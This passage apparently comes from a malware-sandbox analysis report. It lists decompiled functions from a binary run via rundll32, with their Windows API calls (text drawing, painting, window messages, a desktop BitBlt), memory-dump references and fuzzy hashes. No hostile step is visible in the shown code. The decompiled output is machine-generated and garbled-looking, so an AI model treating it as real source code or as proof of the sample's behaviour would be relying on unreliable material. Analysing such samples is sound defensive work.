                          • MulDiv.KERNEL32(00000000,00000060,00000000), ref: 02815A85
                          • MulDiv.KERNEL32(?,?,00000000), ref: 02815B15
                          • MulDiv.KERNEL32(?,?,00000000), ref: 02815B47
                          • MulDiv.KERNEL32(?,?,00000000), ref: 02815B79
                          • MulDiv.KERNEL32(?,?,00000000), ref: 02815B9F
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f418a878a34993f2f1d8bb74979b572ecbc5bc6a8e3f39b1ef413d5a8819d4a6
                          • Instruction ID: 24a1b92fdc1fbf5576dd5bf4e400ec518ff416eeb83b638da1305349c0b61b74
                          • Opcode Fuzzy Hash: f418a878a34993f2f1d8bb74979b572ecbc5bc6a8e3f39b1ef413d5a8819d4a6
                          • Instruction Fuzzy Hash: 82817078A04108EFDB45DBA8C588F9DB7F9AF48304F6581E4E508DB3A2C735AE45DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E0282394C(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				void* _v16;
                          				struct tagRECT _v32;
                          				void* _t53;
                          				int _t63;
                          				CHAR* _t65;
                          				void* _t76;
                          				void* _t78;
                          				int _t89;
                          				CHAR* _t91;
                          				int _t117;
                          				intOrPtr _t127;
                          				void* _t139;
                          				void* _t144;
                          				char _t153;
                          
                          				_t120 = __ecx;
                          				_t143 = _t144;
                          				_v16 = 0;
                          				_v12 = __ecx;
                          				_v8 = __edx;
                          				_t139 = __eax;
                          				_t117 = _a4;
                          				_push(_t144);
                          				_push(0x2823b30);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t144 + 0xffffffe4;
                          				_t53 = E028258E4(__eax);
                          				_t135 = _t53;
                          				if(_t53 != 0 && E02826F20(_t135) != 0) {
                          					if((_t117 & 0x00000000) != 0) {
                          						__eflags = (_t117 & 0x00000002) - 2;
                          						if((_t117 & 0x00000002) == 2) {
                          							_t117 = _t117 & 0xfffffffd;
                          							__eflags = _t117;
                          						}
                          					} else {
                          						_t117 = _t117 & 0xffffffff | 0x00000002;
                          					}
                          					_t117 = _t117 | 0x00020000;
                          				}
                          				E027D4180( &_v16, _v12);
                          				if((_t117 & 0x00000004) == 0) {
                          					L12:
                          					E027D44F4(_v16, 0x2823b54);
                          					if(_t153 != 0) {
                          						E027F7DC0( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
                          						__eflags =  *((char*)(_t139 + 0x3a));
                          						if( *((char*)(_t139 + 0x3a)) != 0) {
                          							_t136 =  *((intOrPtr*)(_v8 + 0xc));
                          							__eflags = E027F7798( *((intOrPtr*)(_v8 + 0xc))) |  *0x2823b58;
                          							E027F77A4( *((intOrPtr*)(_v8 + 0xc)), E027F7798( *((intOrPtr*)(_v8 + 0xc))) |  *0x2823b58, _t136, _t139, _t143);
                          						}
                          						__eflags =  *((char*)(_t139 + 0x39));
                          						if( *((char*)(_t139 + 0x39)) != 0) {
                          							L24:
                          							_t63 = E027D43A8(_v16);
                          							_t65 = E027D45A8(_v16);
                          							DrawTextA(E027F84EC(_v8), _t65, _t63, _a12, _t117);
                          							L25:
                          							_pop(_t127);
                          							 *[fs:eax] = _t127;
                          							_push(0x2823b37);
                          							return E027D40E8( &_v16);
                          						} else {
                          							__eflags = _a8;
                          							if(_a8 == 0) {
                          								OffsetRect(_a12, 1, 1);
                          								E027F74D8( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                          								_t89 = E027D43A8(_v16);
                          								_t91 = E027D45A8(_v16);
                          								DrawTextA(E027F84EC(_v8), _t91, _t89, _a12, _t117);
                          								OffsetRect(_a12, 0xffffffff, 0xffffffff);
                          							}
                          							__eflags = _a8;
                          							if(_a8 == 0) {
                          								L23:
                          								E027F74D8( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
                          							} else {
                          								_t76 = E027F7018(0xff00000d);
                          								_t78 = E027F7018(0xff000010);
                          								__eflags = _t76 - _t78;
                          								if(_t76 != _t78) {
                          									goto L23;
                          								}
                          								E027F74D8( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                          							}
                          							goto L24;
                          						}
                          					}
                          					if((_t117 & 0x00000004) == 0) {
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_v32.top = _v32.top + 4;
                          						DrawEdge(E027F84EC(_v8),  &_v32, 6, 2);
                          					}
                          					goto L25;
                          				} else {
                          					if(_v16 == 0) {
                          						L11:
                          						E027D43B0( &_v16, 0x2823b48);
                          						goto L12;
                          					}
                          					if( *_v16 != 0x26) {
                          						goto L12;
                          					}
                          					_t153 =  *((char*)(_v16 + 1));
                          					if(_t153 != 0) {
                          						goto L12;
                          					}
                          					goto L11;
                          				}
                          			}

                          APIs
                          • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 02823A1B
                          • OffsetRect.USER32(?,00000001,00000001), ref: 02823A6C
                          • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 02823AA1
                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 02823AAE
                          • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 02823B15
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Draw$OffsetRectText$Edge
                          • String ID:
                          • API String ID: 3610532707-0
                          • Opcode ID: 84480871a03e5ae679b61aad76d86e0f66f6f3d7f8f01068e4b85c5a9274c8d3
                          • Instruction ID: 3b5150f00c1ff921d93db226ff0fa3927f8449e8f05ba353aa255a19003b0a3d
                          • Opcode Fuzzy Hash: 84480871a03e5ae679b61aad76d86e0f66f6f3d7f8f01068e4b85c5a9274c8d3
                          • Instruction Fuzzy Hash: 9D519378E04218AFDB52EFA8C895B9EB7FAAF05320F548191F954E7390C739DD848B11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E0282B09C(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
                          				char _v5;
                          				char _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				struct HWND__* _v24;
                          				intOrPtr _v28;
                          				void* _v32;
                          				struct tagRECT _v48;
                          				struct tagRECT _v64;
                          				struct HWND__* _t53;
                          				intOrPtr _t55;
                          				intOrPtr _t60;
                          				intOrPtr _t65;
                          				intOrPtr _t79;
                          				intOrPtr _t85;
                          				intOrPtr _t87;
                          				intOrPtr _t94;
                          				intOrPtr _t99;
                          				intOrPtr _t102;
                          				void* _t103;
                          				intOrPtr* _t105;
                          				intOrPtr _t107;
                          				intOrPtr _t111;
                          				intOrPtr _t113;
                          				struct HWND__* _t114;
                          				intOrPtr _t115;
                          				intOrPtr _t117;
                          				intOrPtr _t118;
                          
                          				_t103 = __ecx;
                          				_t102 = __eax;
                          				_v5 = 1;
                          				_t114 = E0282B4EC(_a4 + 0xfffffff7);
                          				_v24 = _t114;
                          				_t53 = GetWindow(_t114, 4);
                          				_t105 =  *0x28645d4; // 0x2865b58
                          				_t4 =  *_t105 + 0x30; // 0x0
                          				if(_t53 ==  *_t4) {
                          					L6:
                          					if(_v24 == 0) {
                          						L25:
                          						return _v5;
                          					}
                          					_t115 = _t102;
                          					while(1) {
                          						_t55 =  *((intOrPtr*)(_t115 + 0x30));
                          						if(_t55 == 0) {
                          							break;
                          						}
                          						_t115 = _t55;
                          					}
                          					_t113 = E02833F7C(_t115);
                          					_v28 = _t113;
                          					if(_t113 == _v24) {
                          						goto L25;
                          					}
                          					_t13 = _a4 - 0x10; // 0xe87d83e8
                          					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
                          					if(_t60 == 0) {
                          						_t19 = _a4 - 0x10; // 0xe87d83e8
                          						_t107 =  *0x282964c; // 0x2829698
                          						__eflags = E027D3398( *_t19, _t107);
                          						if(__eflags == 0) {
                          							__eflags = 0;
                          							_v32 = 0;
                          						} else {
                          							_t21 = _a4 - 0x10; // 0xe87d83e8
                          							_v32 = E02833F7C( *_t21);
                          						}
                          						L19:
                          						_v12 = 0;
                          						_t65 = _a4;
                          						_v20 =  *((intOrPtr*)(_t65 - 9));
                          						_v16 =  *((intOrPtr*)(_t65 - 5));
                          						EnumThreadWindows(GetCurrentThreadId(), E0282B030,  &_v32);
                          						_t127 = _v12;
                          						if(_v12 == 0) {
                          							goto L25;
                          						}
                          						GetWindowRect(_v24,  &_v48);
                          						_push(_a4 + 0xfffffff7);
                          						_push(_a4 - 1);
                          						E027D3408(_t102, _t127);
                          						_t79 =  *0x2865bb4; // 0x0
                          						_t111 =  *0x28283cc; // 0x2828418
                          						if(E027D3398(_t79, _t111) == 0) {
                          							L23:
                          							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
                          								_v5 = 0;
                          							}
                          							goto L25;
                          						}
                          						_t85 =  *0x2865bb4; // 0x0
                          						if( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x38)) + 0xa0)) == 0) {
                          							goto L23;
                          						}
                          						_t87 =  *0x2865bb4; // 0x0
                          						if(E02833F7C( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x38)) + 0xa0))) == _v24) {
                          							goto L25;
                          						}
                          						goto L23;
                          					}
                          					_t117 = _t60;
                          					while(1) {
                          						_t94 =  *((intOrPtr*)(_t117 + 0x30));
                          						if(_t94 == 0) {
                          							break;
                          						}
                          						_t117 = _t94;
                          					}
                          					_v32 = E02833F7C(_t117);
                          					goto L19;
                          				}
                          				_t118 = E0282A5B0(_v24, _t103);
                          				if(_t118 == 0) {
                          					goto L25;
                          				} else {
                          					while(1) {
                          						_t99 =  *((intOrPtr*)(_t118 + 0x30));
                          						if(_t99 == 0) {
                          							break;
                          						}
                          						_t118 = _t99;
                          					}
                          					_v24 = E02833F7C(_t118);
                          					goto L6;
                          				}
                          			}

                          APIs
                            • Part of subcall function 0282B4EC: WindowFromPoint.USER32(0282B2C6,02865BD8,00000000,0282B0B6,?,02865BC0,?), ref: 0282B4F2
                            • Part of subcall function 0282B4EC: GetParent.USER32(00000000), ref: 0282B509
                          • GetWindow.USER32(00000000,00000004), ref: 0282B0BE
                          • GetCurrentThreadId.KERNEL32 ref: 0282B192
                          • EnumThreadWindows.USER32(00000000,0282B030,?), ref: 0282B198
                          • GetWindowRect.USER32(00000000,?), ref: 0282B1AF
                          • IntersectRect.USER32(?,?,?), ref: 0282B21D
                            • Part of subcall function 0282A5B0: GetWindowThreadProcessId.USER32(?), ref: 0282A5BD
                            • Part of subcall function 0282A5B0: GetCurrentProcessId.KERNEL32(?,00000000,00000000,028272D1,00000000,02826E34,?,00000000,028175E4,00000000), ref: 0282A5C6
                            • Part of subcall function 0282A5B0: GlobalFindAtomA.KERNEL32(00000000), ref: 0282A5DB
                            • Part of subcall function 0282A5B0: GetPropA.USER32(?,00000000), ref: 0282A5F2
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
                          • String ID:
                          • API String ID: 2202917067-0
                          • Opcode ID: 011684b2327cc9ae03c3aee63a0040d312c215c899ba1b52cdbcdcc8e663f22c
                          • Instruction ID: f58c3698549546d2d4c6d3f61e5b0c0abbf59c8300b7748e69ad2a0d888e8073
                          • Opcode Fuzzy Hash: 011684b2327cc9ae03c3aee63a0040d312c215c899ba1b52cdbcdcc8e663f22c
                          • Instruction Fuzzy Hash: 14513E3DA012299FCB11DFA8D484BAEB7F5AF08358F548595E818EB350E730E985CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E0280CF1C(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
                          				char _v8;
                          				int _t40;
                          				CHAR* _t42;
                          				int _t54;
                          				CHAR* _t56;
                          				int _t65;
                          				CHAR* _t67;
                          				intOrPtr* _t76;
                          				intOrPtr _t86;
                          				struct tagRECT* _t91;
                          				signed int _t93;
                          				int _t94;
                          				intOrPtr _t97;
                          				signed int _t104;
                          
                          				_push(0);
                          				_t93 = __ecx;
                          				_t91 = __edx;
                          				_t76 = __eax;
                          				_push(_t97);
                          				_push(0x280d072);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t97;
                          				 *((intOrPtr*)( *__eax + 0x90))();
                          				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
                          					E027D43B0( &_v8, 0x280d088);
                          				}
                          				if( *((char*)(_t76 + 0x170)) == 0) {
                          					_t104 = _t93;
                          				}
                          				_t94 = E0282FA68(_t76, _t93, _t104);
                          				E027F83E8( *((intOrPtr*)(_t76 + 0x160)));
                          				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
                          					_t40 = E027D43A8(_v8);
                          					_t42 = E027D45A8(_v8);
                          					DrawTextA(E027F84EC( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94);
                          				} else {
                          					OffsetRect(_t91, 1, 1);
                          					E027F74D8( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0xff000014);
                          					_t54 = E027D43A8(_v8);
                          					_t56 = E027D45A8(_v8);
                          					DrawTextA(E027F84EC( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
                          					OffsetRect(_t91, 0xffffffff, 0xffffffff);
                          					E027F74D8( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0xff000010);
                          					_t65 = E027D43A8(_v8);
                          					_t67 = E027D45A8(_v8);
                          					DrawTextA(E027F84EC( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
                          				}
                          				_pop(_t86);
                          				 *[fs:eax] = _t86;
                          				_push(0x280d079);
                          				return E027D40E8( &_v8);
                          			}

                          APIs
                          • OffsetRect.USER32(?,00000001,00000001), ref: 0280CFB6
                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0280CFEE
                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 0280CFF8
                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0280D030
                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0280D057
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: DrawText$OffsetRect
                          • String ID:
                          • API String ID: 1886049697-0
                          • Opcode ID: b22fd8b2eafbab35a4dac19df8e143e16bcc4852d413cbcde3031150f173032a
                          • Instruction ID: 99a0b624cef64aece5bdd370b65f583bbe835fe9237c72ab5f2c35ed88408c21
                          • Opcode Fuzzy Hash: b22fd8b2eafbab35a4dac19df8e143e16bcc4852d413cbcde3031150f173032a
                          • Instruction Fuzzy Hash: 49314F34A04204AFDB52EB69CD89F9FB7BEAF45310F1541B1B808EB2A5CB709D05DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E02831C30(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                          				intOrPtr* _v8;
                          				intOrPtr _v12;
                          				int _v16;
                          				int _v20;
                          				struct tagPAINTSTRUCT _v84;
                          				intOrPtr _t55;
                          				void* _t64;
                          				struct HDC__* _t75;
                          				intOrPtr _t84;
                          				void* _t95;
                          				void* _t96;
                          				void* _t98;
                          				void* _t100;
                          				void* _t101;
                          				intOrPtr _t102;
                          
                          				_t100 = _t101;
                          				_t102 = _t101 + 0xffffffb0;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_t4 = _v12 + 4; // 0x55dfebff
                          				_t75 =  *_t4;
                          				if(_t75 == 0) {
                          					_t75 = BeginPaint(E02833F7C(_v8),  &_v84);
                          				}
                          				_push(_t100);
                          				_push(0x2831d50);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t102;
                          				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
                          					_v20 = SaveDC(_t75);
                          					_v16 = 2;
                          					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
                          					if(_t95 >= 0) {
                          						_t96 = _t95 + 1;
                          						_t98 = 0;
                          						do {
                          							_t64 = E027EB1E0( *((intOrPtr*)(_v8 + 0x198)), _t98);
                          							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
                          								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
                          									goto L11;
                          								} else {
                          									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
                          									if(_v16 != 1) {
                          										goto L11;
                          									}
                          								}
                          							} else {
                          								goto L11;
                          							}
                          							goto L12;
                          							L11:
                          							_t98 = _t98 + 1;
                          							_t96 = _t96 - 1;
                          						} while (_t96 != 0);
                          					}
                          					L12:
                          					if(_v16 != 1) {
                          						 *((intOrPtr*)( *_v8 + 0xb8))();
                          					}
                          					RestoreDC(_t75, _v20);
                          				} else {
                          					 *((intOrPtr*)( *_v8 + 0xb8))();
                          				}
                          				E02831D88(_v8, 0, _t75);
                          				_pop(_t84);
                          				 *[fs:eax] = _t84;
                          				_push(0x2831d57);
                          				_t55 = _v12;
                          				if( *((intOrPtr*)(_t55 + 4)) == 0) {
                          					return EndPaint(E02833F7C(_v8),  &_v84);
                          				}
                          				return _t55;
                          			}

                          APIs
                          • BeginPaint.USER32(00000000,?), ref: 02831C56
                          • SaveDC.GDI32(55DFEBFF), ref: 02831C8A
                          • ExcludeClipRect.GDI32(55DFEBFF,?,?,?,?,55DFEBFF), ref: 02831CEC
                          • RestoreDC.GDI32(55DFEBFF,02816B8B), ref: 02831D16
                          • EndPaint.USER32(00000000,?,02831D57), ref: 02831D4A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                          • String ID:
                          • API String ID: 3808407030-0
                          • Opcode ID: 904a6d175112252cc48b1776a50908ee566eb58b6e925593c7e8c74bba6fec0a
                          • Instruction ID: e33fddabe3a605004e0576a2fa54eef2e72be81473e182b96906d3c9a27218fb
                          • Opcode Fuzzy Hash: 904a6d175112252cc48b1776a50908ee566eb58b6e925593c7e8c74bba6fec0a
                          • Instruction Fuzzy Hash: 78413078A002049FDB16DBA9C888FADB7F9AF49714F1580A8D508D7261D735AD45CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0281E2A4(intOrPtr __eax, intOrPtr* __edx) {
                          				intOrPtr _v8;
                          				intOrPtr* _v12;
                          				char _v13;
                          				struct HWND__* _v20;
                          				void* _t86;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_v13 = 0;
                          				if( *((intOrPtr*)(_v12 + 4)) < 0x100 ||  *((intOrPtr*)(_v12 + 4)) > 0x108) {
                          					L16:
                          					return _v13;
                          				} else {
                          					_v20 = GetCapture();
                          					if(_v20 != 0) {
                          						if(GetWindowLongA(_v20, 0xfffffffa) ==  *0x2865668) {
                          							_t38 = _v12 + 0xc; // 0x84fffffc
                          							_t40 = _v12 + 8; // 0xe1e8fc45
                          							_t42 = _v12 + 4; // 0x8bf8558b
                          							if(SendMessageA(_v20,  *_t42 + 0xbc00,  *_t40,  *_t38) != 0) {
                          								_v13 = 1;
                          							}
                          						}
                          						goto L16;
                          					}
                          					_v20 =  *_v12;
                          					if( *((intOrPtr*)(_v8 + 0x44)) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x44)) + 0x254)) != _v20) {
                          						goto L7;
                          						L7:
                          						if(E0282A5B0(_v20, _t86) != 0 || _v20 == 0) {
                          							if(_v20 == 0) {
                          								_v20 =  *_v12;
                          							}
                          							goto L11;
                          						} else {
                          							_v20 = GetParent(_v20);
                          							goto L7;
                          						}
                          					} else {
                          						_v20 = E02833F7C( *((intOrPtr*)(_v8 + 0x44)));
                          						L11:
                          						_t29 = _v12 + 0xc; // 0x84fffffc
                          						_t31 = _v12 + 8; // 0xe1e8fc45
                          						_t33 = _v12 + 4; // 0x8bf8558b
                          						if(SendMessageA(_v20,  *_t33 + 0xbc00,  *_t31,  *_t29) != 0) {
                          							_v13 = 1;
                          						}
                          						goto L16;
                          					}
                          				}
                          			}

                          APIs
                          • GetCapture.USER32 ref: 0281E2D4
                          • SendMessageA.USER32(00000000,8BF7998B,E1E8FC45,84FFFFFC), ref: 0281E362
                          • GetWindowLongA.USER32(00000000,000000FA), ref: 0281E377
                          • SendMessageA.USER32(00000000,8BF7998B,E1E8FC45,84FFFFFC), ref: 0281E3A2
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: MessageSend$CaptureLongWindow
                          • String ID:
                          • API String ID: 1158686931-0
                          • Opcode ID: a785a4118dc997d473d9ac3d0ba65dfc96ba26484e8d032917a820de5640b9e2
                          • Instruction ID: 67a34a6217db03ce40fbbc6bc8682de2f8fe3b4a11e858b3685d95bd9e75743d
                          • Opcode Fuzzy Hash: a785a4118dc997d473d9ac3d0ba65dfc96ba26484e8d032917a820de5640b9e2
                          • Instruction Fuzzy Hash: 2C419778A00259DFDB50DB98C988FADBBF9BF08314F094594E958E7391D374E980CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E028057AC(void* __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, void* _a12) {
                          				struct tagRECT _v20;
                          				void* __edi;
                          				void* __ebp;
                          				int _t17;
                          				CHAR* _t19;
                          				int _t31;
                          				CHAR* _t33;
                          				int _t43;
                          				CHAR* _t45;
                          				void* _t49;
                          				signed int _t56;
                          				int _t57;
                          				void* _t61;
                          
                          				asm("movsd");
                          				asm("movsd");
                          				asm("movsd");
                          				asm("movsd");
                          				_t60 = __ecx;
                          				_t49 = __edx;
                          				_t56 = _a4;
                          				E027F7DC0( *((intOrPtr*)(__edx + 0x14)), __ecx, 1, _t56, _t61, __eflags);
                          				if(_a8 != 1) {
                          					_t57 = _t56 | 0x00000005;
                          					__eflags = _t57;
                          					_t17 = E027D43A8(__ecx);
                          					_t19 = E027D45A8(__ecx);
                          					return DrawTextA(E027F84EC(_t49), _t19, _t17,  &_v20, _t57);
                          				}
                          				OffsetRect( &_v20, 1, 1);
                          				E027F74D8( *((intOrPtr*)(_t49 + 0xc)), 0xff000014);
                          				_t31 = E027D43A8(_t60);
                          				_t33 = E027D45A8(_t60);
                          				DrawTextA(E027F84EC(_t49), _t33, _t31,  &_v20, _t56 | 0x00000005);
                          				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
                          				E027F74D8( *((intOrPtr*)(_t49 + 0xc)), 0xff000010);
                          				_t43 = E027D43A8(_t60);
                          				_t45 = E027D45A8(_t60);
                          				return DrawTextA(E027F84EC(_t49), _t45, _t43,  &_v20, _t56 | 0x00000005);
                          			}

                          APIs
                          • OffsetRect.USER32(?,00000001,00000001), ref: 028057E2
                          • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 02805816
                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 02805823
                          • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 02805855
                          • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0280587C
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: DrawText$OffsetRect
                          • String ID:
                          • API String ID: 1886049697-0
                          • Opcode ID: 3f99b3ec8967ebee851acf4b9195d43cb0b86b88460d0ecb1224d150dc4dbd24
                          • Instruction ID: cdf2616b4a48fcf31b513c6019c530b4bab91a366d23d1dc3941750037fafbcb
                          • Opcode Fuzzy Hash: 3f99b3ec8967ebee851acf4b9195d43cb0b86b88460d0ecb1224d150dc4dbd24
                          • Instruction Fuzzy Hash: E521E472B001282BCB82FB6CDC88DAF73BEAF44321B004515B958FB380DA75E9014FA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E02842FF8(intOrPtr __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                          				intOrPtr _v8;
                          				struct HDC__* _v12;
                          				void* __ebp;
                          				intOrPtr _t35;
                          				intOrPtr _t75;
                          				void* _t81;
                          				void* _t83;
                          				intOrPtr _t84;
                          
                          				_t81 = _t83;
                          				_t84 = _t83 + 0xffffffe8;
                          				_v8 = __eax;
                          				E02833968(_v8, __ecx, __edx, _a4, _a8);
                          				_t35 = _v8;
                          				if( *((char*)(_t35 + 0x57)) != 0) {
                          					return _t35;
                          				} else {
                          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x230)))) + 0x40))();
                          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x230)))) + 0x34))();
                          					_v12 = GetDC(GetDesktopWindow());
                          					_push(_t81);
                          					_push(0x28430c4);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t84;
                          					BitBlt(E027F84EC(E027FC894( *((intOrPtr*)(_v8 + 0x230)))), 0, 0,  *(_v8 + 0x48),  *(_v8 + 0x4c), _v12,  *(_v8 + 0x40),  *(_v8 + 0x44), 0xcc0020);
                          					_pop(_t75);
                          					 *[fs:eax] = _t75;
                          					_push(0x28430cb);
                          					return ReleaseDC(GetDesktopWindow(), _v12);
                          				}
                          			}

                          APIs
                            • Part of subcall function 02833968: IsIconic.USER32(?), ref: 028339A7
                            • Part of subcall function 02833968: SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 028339C5
                          • GetDesktopWindow.USER32 ref: 02843049
                          • GetDC.USER32(00000000), ref: 0284304F
                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 028430A2
                          • GetDesktopWindow.USER32 ref: 028430B8
                          • ReleaseDC.USER32(00000000,?), ref: 028430BE
                          Memory Dump Source
